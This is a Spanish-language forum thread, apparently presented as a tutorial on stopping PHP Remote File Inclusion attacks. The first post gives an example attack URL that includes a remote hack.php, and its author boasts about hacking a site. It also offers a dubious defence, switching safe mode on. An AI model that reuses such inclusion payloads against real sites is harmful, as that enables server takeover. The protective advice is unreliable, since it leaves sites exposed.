[TUTORIAL] Evitar ataques RFI a la web de tu server (solo php es vulnerable)
#1

Hola! les traigo este tutorial porque en el foro vi un topic que decia me han hackeado el web, bueno y esto por que es?

miremos este ejemplo:

www.asdadada.com/index.php?id=descargas

que esta haciendo ahi es incluir un archivo, pero php tiene la funcionalidad de incluir archivos externos ajenos a el servidor o internos, que pasa con esto, es que ahi estamos dejando un agujero de seguridad para que inserten cualquier otra cosa.

Yo podria hackearlo asi:

http://www.asasad.com/index.php?id=w...z.com/hack.php

entonces ejecutaria ese hack.php en la pagina victima, eso es un potencial riesgo de seguridad, por algo es uno de los hacks mas divertidos jejejeje. ese hack.php podria incluir la forma de tener el control del servidor, modificar el index de la victima, etc

Como protegerse?

Simple, en todos los hostings hay una opcion llamada safe_mod = off, bueno lo ponen en on y ya estan protegidos, en los hostings pagos nada mas, los hostings gratis no permite activar y desactivar safe_mod, asi hackee redrol xD.

Bueno espero que les guste el tuto!. Breve pero les servira.
Reply
#2

vos te crees hacker ¬¬
Reply
#3

Quote:
Originally Posted by FlowMen
vos te crees hacker ¬¬
Es un hacker...
Reply
#4

Es Xeno
Reply
#5

Gracias por los comentarios, flow men no me creo hacker, lo soy guste o no te guste.
Reply
#6

si me gusta por que me conviene
Reply
#7

Mis tiempos lammers, metiendo shells como n00b

Reply
#8

Quote:
Originally Posted by QFreakz™
Mis tiempos lammers, metiendo shells como n00b
En realidad Xenowort es mбs 'white hacker', es decir, se compromete a realiar y divulgar conocimientos informбticos... aunque a veces le de por saciar su sed de venganza contra los demбs o solamente se considera pнcaro, ataca servidores y webs, con un arrepentimiento a posteriori

Simplemente es un ser ъnico que desйa demostrar al mundo sus conocimientos y expectativas, ademбs de querer llamar la atenciуn, como yo :P
Reply
#9

jaja que gueno xD!!
Reply
#10

Quote:
Originally Posted by QFreakz™
Mis tiempos lammers, metiendo shells como n00b

noob ?? jajaj es un ataque RFi es una inclusion de archivos a el servidor no es solo intencion de destruir paginas, si no de que aprendan a poder cubrir este tipo de problemas, y no soy lammer, cuidate cuando escribis, te lo digo de onda .

Quote:
Originally Posted by CristianTdj
Quote:
Originally Posted by QFreakz™
Mis tiempos lammers, metiendo shells como n00b
En realidad Xenowort es mбs 'white hacker', es decir, se compromete a realiar y divulgar conocimientos informбticos... aunque a veces le de por saciar su sed de venganza contra los demбs o solamente se considera pнcaro, ataca servidores y webs, con un arrepentimiento a posteriori

Simplemente es un ser ъnico que desйa demostrar al mundo sus conocimientos y expectativas, ademбs de querer llamar la atenciуn, como yo :P
jejeje tenes razon Cristian gracias por tu gran comentario.
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)